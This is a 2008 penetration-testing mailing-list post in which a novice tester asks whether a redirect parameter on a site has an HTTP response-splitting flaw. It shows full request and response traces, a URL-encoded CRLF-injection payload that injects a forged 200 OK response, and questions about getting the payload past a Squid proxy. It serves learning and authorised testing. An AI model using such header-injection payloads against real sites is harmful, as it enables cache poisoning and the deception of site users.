Penetration Testing mailing list archives
Is there a HTTP Respone Splitting Flaw?
From: bin4ry () theknetgroup org
Date: 29 Apr 2008 06:46:18 -0000
Hi together, i'm new to this community as well as to pen-testing. I'v already done some jobs for smaller companies and it-infrastructures. Now i have to pen-test a website. I need to perform a black-box-test and i've already found some xss- and some sql-injection-bugs which i've reported to the site admin. Now i believe that there's a http response splitting flaw as well. I found this suspicious ressource: foo.bar/accept?dest=/xy/z This looks like a redir-script, right? So this is what i get: GET foo.bar/accept?dest=/xy/z HTTP/1.1 Host: foo.barUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Pragma: no-cache Proxy-Connection: keep-alive HTTP/1.x 302 Moved Temporarily <<<<<< look suspicious Via: A_PROXY Connection: close Proxy-Connection: close Date: Fri, 25 Apr 2008 12:09:42 GMT Location: foo.bar/xy/z <<<<<<< Content-Type: text/html; charset=utf-8 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Cache-Control: no-cache, private X-Runtime: 0.39293 X-Powered-By: Servlet/2.4 JSP/2.0 X-Cache: MISS from prx-deka-02.f.ddk ---------------------------------------------------------- GET /xy/z HTTP/1.1 <<<<< thats it, right? Host: foo.bar User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive If-None-Match: "e7346ba9885de32fe8d51358b8a409af" HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy Via: A_PROXY Date: Fri, 25 Apr 2008 12:09:42 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Etag: "e7346ba9885de32fe8d51358b8a409af" Cache-Control: private, max-age=0, must-revalidate, private X-Cache: MISS from A_PROXY Till now evrything looks like a response splitting flaw. Thats why i pass this one to $dest: /xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E Which is: /xy/z HTTP/1.1 200 OK Content-Type: text/html Pragma: no-cache Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT Content-Length: 36 <html>HTTP Response Splitting</html> So, again our http traffic now with a injected http header: GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1 Host: foo.bar User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Pragma: no-cache Proxy-Connection: keep-alive HTTP/1.x 302 Moved Temporarily Via: A_PROXY Connection: close Proxy-Connection: close Date: Fri, 25 Apr 2008 12:07:47 GMT Location: foo.bar/de/xy/z Content-Type: text/html; charset=utf-8 Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Cache-Control: no-cache, private X-Powered-By: Servlet/2.4 JSP/2.0 X-Cache: MISS from A_PROXY ---------------------------------------------------------- GET /xy/z HTTP/1.1 Host: foo.bar User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46" HTTP/1.x 304 Not Modified Via: 1.0 A_PROXY Date: Fri, 25 Apr 2008 12:07:48 GMT Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d Etag: "78ad90f3569fd7b31ad763f3f52e2c46" Cache-Control: private, max-age=0, must-revalidate, private X-Cache: MISS A_PROXY As u can see, the injected header won't be matched to the http-request from the redir-script. I tried several crlf-types: %0d%0a , %0a%0a and %0a but as we can see this is a linuxbox therefore %0d%0a should work. There's a squid between me and foo.bar. The whitepaper from sanctum sais that squid has a packet boundary approach and messages are read as packets and therefore injected headers may need 2 be padded. Someone can help me out? Thx P.S.: And another question. Since i am not really familiar with response splitting, i'd like to ask you whether the risc of response splitting is always present when a script utilizes user-input to form a new address which is the target of a rediriction script, which manifests in a http 302 header from the server? Thanks and greetings to the community from germany. ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Is there a HTTP Respone Splitting Flaw? bin4ry (Apr 29)
- Re: Is there a HTTP Respone Splitting Flaw? Gleb Paharenko (Apr 30)